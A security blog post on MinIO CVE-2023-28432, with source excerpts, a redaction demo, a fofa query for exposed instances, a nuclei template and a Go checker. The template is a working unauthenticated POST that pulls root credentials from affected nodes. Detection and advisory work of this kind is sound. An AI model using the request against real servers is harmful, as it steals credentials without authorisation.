

CVE-2023-28432

2023-03-24 14:15 Author: 青陽小棧


CVE-2023-28432 nuclei templates

Description

Minio is a Multi-Cloud Object Storage framework. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, resulting in information disclosure. All users of distributed deployment are impacted. All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z.

Because the response carries the node's root credentials, an affected node that was reachable from an untrusted network should have MINIO_ROOT_USER/MINIO_ROOT_PASSWORD (and the legacy MINIO_ACCESS_KEY/MINIO_SECRET_KEY pair, if set) rotated after the upgrade, not merely patched.

vuln info

Source excerpts from the MinIO repository (line anchors as recorded by the author; paths are on the master branch at the time of writing):

# https://github.com/minio/minio/blob/master/cmd/bootstrap-peer-server.go#L197
// Verify - fetches system server config.
func (client *bootstrapRESTClient) Verify(ctx context.Context, srcCfg ServerSystemConfig) (err error) {
	if newObjectLayerFn() != nil {
		return nil
	}
	respBody, err := client.callWithContext(ctx, bootstrapRESTMethodVerify, nil, nil, -1)
	if err != nil {
		return
	}
	defer xhttp.DrainBody(respBody)
	recvCfg := ServerSystemConfig{}
	if err = json.NewDecoder(respBody).Decode(&recvCfg); err != nil {
		return err
	}
	return srcCfg.Diff(recvCfg)
}

# https://github.com/minio/minio/blob/master/cmd/bootstrap-peer-server.go#L54
const (
	bootstrapRESTVersion       = "v1"
	bootstrapRESTVersionPrefix = SlashSeparator + bootstrapRESTVersion
	bootstrapRESTPrefix        = minioReservedBucketPath + "/bootstrap"
	bootstrapRESTPath          = bootstrapRESTPrefix + bootstrapRESTVersionPrefix
)

const (
	bootstrapRESTMethodHealth = "/health"
	bootstrapRESTMethodVerify = "/verify"
)

// To abstract a node over network.
type bootstrapRESTServer struct{}

// ServerSystemConfig - captures information about server configuration.
type ServerSystemConfig struct {
	MinioEndpoints EndpointServerPools
	MinioEnv       map[string]string
}

# https://github.com/minio/minio/blob/master/cmd/bootstrap-peer-server.go#L149
func (b *bootstrapRESTServer) VerifyHandler(w http.ResponseWriter, r *http.Request) {
	ctx := newContext(r, w, "VerifyHandler")
	if err := storageServerRequestValidate(r); err != nil {
		b.writeErrorResponse(w, err)
		return
	}
	cfg := getServerSystemCfg()
	logger.LogIf(ctx, json.NewEncoder(w).Encode(&cfg))
}

// registerBootstrapRESTHandlers - register bootstrap rest router.
func registerBootstrapRESTHandlers(router *mux.Router) {
	server := &bootstrapRESTServer{}
	subrouter := router.PathPrefix(bootstrapRESTPrefix).Subrouter()
	subrouter.Methods(http.MethodPost).Path(bootstrapRESTVersionPrefix + bootstrapRESTMethodHealth).HandlerFunc(
		httpTraceHdrs(server.HealthHandler))
	subrouter.Methods(http.MethodPost).Path(bootstrapRESTVersionPrefix + bootstrapRESTMethodVerify).HandlerFunc(
		httpTraceHdrs(server.VerifyHandler))
}

# https://github.com/minio/minio/blob/master/cmd/object-api-utils.go#L210
// SlashSeparator - slash separator.
const SlashSeparator = "/"

# https://github.com/minio/minio/blob/master/cmd/generic-handlers.go#L138
const (
	minioReservedBucket              = "minio"
	minioReservedBucketPath          = SlashSeparator + minioReservedBucket
	minioReservedBucketPathWithSlash = SlashSeparator + minioReservedBucket + SlashSeparator
)

Putting the constants together gives the route:

SlashSeparator             = "/"
minioReservedBucketPath    = SlashSeparator + minioReservedBucket          ==> /minio
bootstrapRESTPrefix        = minioReservedBucketPath + "/bootstrap"        ==> /minio/bootstrap
bootstrapRESTVersion       = "v1"
bootstrapRESTVersionPrefix = SlashSeparator + bootstrapRESTVersion         ==> /v1
bootstrapRESTMethodVerify  = "/verify"
subrouter.Methods(http.MethodPost).Path(bootstrapRESTVersionPrefix + bootstrapRESTMethodVerify) ==> /v1/verify

final path: /minio/bootstrap/v1/verify

Why this leaks: VerifyHandler runs storageServerRequestValidate(r) and then writes the result of getServerSystemCfg() straight into the response. ServerSystemConfig carries MinioEnv map[string]string, the node's environment, so whatever passes that check receives every variable, MINIO_ROOT_PASSWORD included; on affected releases an unauthenticated POST passes (the CVSS vector is PR:N). The route is registered for POST only, which is why the template below uses POST rather than GET. The client-side Verify method shows why the data exists at all: peers exchange their configuration during bootstrap and compare it with srcCfg.Diff(recvCfg).
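The handler pattern above, reduced to a runnable form, as an added example (this is not MinIO's code and not the upstream fix; the struct is modelled on the snippet with endpoints as plain strings, the request check is a stand-in that accepts any POST, and the deny-list of sensitive keys is this example's own assumption). It shows the vulnerable behaviour (every variable copied into MinioEnv) next to a hardened variant that drops credential-bearing keys before serialisation, and probes both in-process the way the nuclei template would:

```go
package main

import (
	"encoding/json"
	"fmt"
	"net/http"
	"net/http/httptest"
	"sort"
	"strings"
)

// serverSystemConfig mirrors the two fields of MinIO's ServerSystemConfig from the
// snippet. Assumption: endpoints are plain strings, not EndpointServerPools.
type serverSystemConfig struct {
	MinioEndpoints []string          `json:"MinioEndpoints"`
	MinioEnv       map[string]string `json:"MinioEnv"`
}

// sensitiveEnvKeys is this example's own deny-list (an assumption, not the list
// MinIO ships); nothing in it may leave the process.
var sensitiveEnvKeys = map[string]bool{
	"MINIO_ROOT_USER": true, "MINIO_ROOT_PASSWORD": true,
	"MINIO_ACCESS_KEY": true, "MINIO_SECRET_KEY": true,
}

// buildConfig assembles the config from KEY=VALUE strings. redact=false copies
// every variable (the vulnerable behaviour); redact=true drops sensitive keys
// before anything is serialised.
func buildConfig(environ, endpoints []string, redact bool) serverSystemConfig {
	cfg := serverSystemConfig{MinioEndpoints: endpoints, MinioEnv: map[string]string{}}
	for _, kv := range environ {
		k, v, ok := strings.Cut(kv, "=")
		if !ok || (redact && sensitiveEnvKeys[k]) {
			continue
		}
		cfg.MinioEnv[k] = v
	}
	return cfg
}

// verifyHandler has the shape of VerifyHandler in the snippet: a request check,
// then json.NewEncoder(w).Encode(&cfg). The check is a stand-in that accepts any
// POST, as an unauthenticated probe experiences on an affected release
// (assumption for the demo, not MinIO's validation code).
func verifyHandler(environ, endpoints []string, redact bool) http.HandlerFunc {
	return func(w http.ResponseWriter, r *http.Request) {
		if r.Method != http.MethodPost {
			http.Error(w, "method not allowed", http.StatusMethodNotAllowed)
			return
		}
		cfg := buildConfig(environ, endpoints, redact)
		// No Content-Type is set, so Go's sniffer labels the JSON text/plain,
		// which is the header the nuclei matcher keys on.
		_ = json.NewEncoder(w).Encode(&cfg)
	}
}

// probeResult is what a client learns from one POST to the verify path.
type probeResult struct {
	Status      int
	ContentType string
	Leaked      []string // sensitive keys present in MinioEnv, sorted
}

// probe sends the template's request in-process and reports what came back.
func probe(h http.Handler) (probeResult, error) {
	rec := httptest.NewRecorder()
	req := httptest.NewRequest(http.MethodPost, "/minio/bootstrap/v1/verify", nil)
	req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
	h.ServeHTTP(rec, req)
	res := probeResult{Status: rec.Code, ContentType: rec.Header().Get("Content-Type")}
	var got serverSystemConfig
	if err := json.NewDecoder(rec.Body).Decode(&got); err != nil {
		return res, err
	}
	for k := range got.MinioEnv {
		if sensitiveEnvKeys[k] {
			res.Leaked = append(res.Leaked, k)
		}
	}
	sort.Strings(res.Leaked)
	return res, nil
}

func main() {
	// Constructed environment for the demo, not a real deployment.
	env := []string{"MINIO_ROOT_USER=minioadmin", "MINIO_ROOT_PASSWORD=minioadmin",
		"MINIO_VOLUMES=http://node{1...4}:9000/data", "PATH=/usr/bin"}
	eps := []string{"http://node1:9000/data", "http://node2:9000/data"}
	for _, redact := range []bool{false, true} {
		res, err := probe(verifyHandler(env, eps, redact))
		if err != nil {
			fmt.Println("decode error:", err)
			continue
		}
		fmt.Printf("redact=%-5v status=%d content-type=%q leaked=%v\n",
			redact, res.Status, res.ContentType, res.Leaked)
	}
}
```

Filtering at serialisation time is the narrowest fix for the leak itself; it does not replace authenticating the bootstrap peer, which the snippet's storageServerRequestValidate is meant to do. The status and Content-Type the recorder reports are exactly the two header-level conditions the nuclei template matches on.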

fofa

app="minio"

EXP

id: CVE-2023-28432

info:
  name: MinIO bootstrap verify endpoint information disclosure
  author: Mr-xn
  severity: high
  description: |
    Minio is a Multi-Cloud Object Storage framework. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, resulting in information disclosure. All users of distributed deployment are impacted. All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z.
  reference:
    - https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q
    - https://github.com/minio/minio/pull/16853/files
    - https://github.com/golang/vulndb/issues/1667
    - https://github.com/CVEProject/cvelist/blob/master/2023/28xxx/CVE-2023-28432.json
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-28432
    cwe-id: CWE-200
  tags: cve,cve2023,minio,disclosure

requests:
  - raw:
      - |+
        POST /minio/bootstrap/v1/verify HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"MinioEndpoints"'
          - '"MinioEnv"'
        condition: and

      - type: word
        part: header
        words:
          - 'Content-Type: text/plain'

      - type: status
        status:
          - 200

nuclei

nuclei -v -t /path/to/CVE-2023-28432.yaml -u http://target.com:port
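The same check without nuclei, as an added example that is not part of the original post or of the nuclei project: a small Go checker that applies the template's three matchers (status 200, Content-Type text/plain, body containing "MinioEndpoints") to a response, then decodes the body and reports which credential-bearing variables came back with their values masked, so a scan log never holds the secret itself. The list of sensitive keys, the masking rule and the request timeouts are this example's own assumptions:

```go
package main

import (
	"context"
	"encoding/json"
	"fmt"
	"io"
	"net/http"
	"os"
	"strings"
	"time"
)

// verifyPath is the route derived above from the bootstrap REST constants.
const verifyPath = "/minio/bootstrap/v1/verify"

// verifyResponse is the part of an affected node's answer this checker reads;
// MinioEndpoints is kept raw because only its presence matters.
type verifyResponse struct {
	MinioEndpoints json.RawMessage   `json:"MinioEndpoints"`
	MinioEnv       map[string]string `json:"MinioEnv"`
}

// Result is the verdict for one target.
type Result struct {
	Vulnerable bool
	Leaked     map[string]string // sensitive variable -> masked value
}

// sensitiveKeys is this example's own list of credential-bearing variables
// (an assumption; extend it for your deployment).
var sensitiveKeys = []string{
	"MINIO_ROOT_USER", "MINIO_ROOT_PASSWORD", "MINIO_ACCESS_KEY", "MINIO_SECRET_KEY",
}

// mask keeps the first two characters so a finding can be correlated with a
// known credential without writing the secret into scanner output.
func mask(v string) string {
	if len(v) <= 2 {
		return strings.Repeat("*", len(v))
	}
	return v[:2] + strings.Repeat("*", len(v)-2)
}

// classify applies the template's matchers and, when all three hit, decodes the
// body and records which sensitive variables leaked.
func classify(status int, contentType string, body []byte) Result {
	res := Result{Leaked: map[string]string{}}
	if status != http.StatusOK ||
		!strings.Contains(contentType, "text/plain") ||
		!strings.Contains(string(body), `"MinioEndpoints"`) {
		return res
	}
	var vr verifyResponse
	if err := json.Unmarshal(body, &vr); err != nil {
		return res // contains the word but is not the config JSON: no hit
	}
	res.Vulnerable = true
	for _, k := range sensitiveKeys {
		if v, ok := vr.MinioEnv[k]; ok {
			res.Leaked[k] = mask(v)
		}
	}
	return res
}

// checkTarget POSTs to the verify path on baseURL and classifies the answer.
// Redirects are not followed and the body is capped, so a hostile or misrouted
// endpoint cannot drag the scanner elsewhere or exhaust its memory.
func checkTarget(ctx context.Context, baseURL string) (Result, error) {
	client := &http.Client{
		Timeout: 10 * time.Second,
		CheckRedirect: func(*http.Request, []*http.Request) error {
			return http.ErrUseLastResponse
		},
	}
	req, err := http.NewRequestWithContext(ctx, http.MethodPost,
		strings.TrimRight(baseURL, "/")+verifyPath, nil)
	if err != nil {
		return Result{}, err
	}
	req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
	resp, err := client.Do(req)
	if err != nil {
		return Result{}, err
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(io.LimitReader(resp.Body, 1<<20))
	if err != nil {
		return Result{}, err
	}
	return classify(resp.StatusCode, resp.Header.Get("Content-Type"), body), nil
}

func main() {
	if len(os.Args) != 2 {
		fmt.Fprintln(os.Stderr, "usage: minio-28432-check http://host:9000")
		os.Exit(2)
	}
	res, err := checkTarget(context.Background(), os.Args[1])
	if err != nil {
		fmt.Fprintln(os.Stderr, "request failed:", err)
		os.Exit(1)
	}
	fmt.Printf("vulnerable=%v leaked=%v\n", res.Vulnerable, res.Leaked)
}
```

A node that answers 404 or 405 on this path, or that answers 200 with a body that is not the config JSON, is reported as not vulnerable; only the full config shape counts as a hit, which keeps false positives from generic text/plain responses out of the results.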

reference:

  • https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q
  • https://github.com/minio/minio/pull/16853/files
  • https://github.com/golang/vulndb/issues/1667
  • https://github.com/CVEProject/cvelist/blob/master/2023/28xxx/CVE-2023-28432.json

